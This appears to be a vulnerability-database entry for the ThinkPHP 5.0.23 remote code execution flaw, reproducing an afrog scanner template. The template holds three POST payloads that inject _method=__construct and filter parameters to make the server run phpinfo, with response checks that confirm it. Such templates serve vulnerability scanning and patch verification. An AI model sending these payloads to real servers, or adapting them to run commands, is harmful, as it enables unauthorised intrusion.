thinkphp-5023-rce: ThinkPHP 5.0.23 RCE

日期: 2025-09-01 | 影响软件: ThinkPHP 5.0.23 | POC: 已公开

漏洞描述

Thinkphp5 5.0(<5.0.24) Remote Code Execution.

PoC代码[已公开]

id: thinkphp-5023-rce

info:
  name: ThinkPHP 5.0.23 RCE
  author: dr_set
  severity: critical
  description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
  reference: 
    - https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce

rules:
    r0:
        request:
            method: POST
            path: /?s=captcha&test=-1
            body: |
                _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
        expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td><td class="v">([0-9.]+)'.bmatches(response.body)
    r1:
        request:
            method: POST
            path: /?s=captcha&test=-1
            body: |
                _method=__ConStruct&method=get&filter[]=call_user_func&get[0]=phpinfo
        expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td><td class="v">([0-9.]+)'.bmatches(response.body)
    r2:
        request:
            method: POST
            path: /?s=captcha&test=-1
            body: |
                _method=__construct&filter[]=phpinfo&method=GET&get[]=1
        expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td><td class="v">([0-9.]+)'.bmatches(response.body)
expression: r0() || r1() || r2()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-5023-rce.yaml

相关漏洞推荐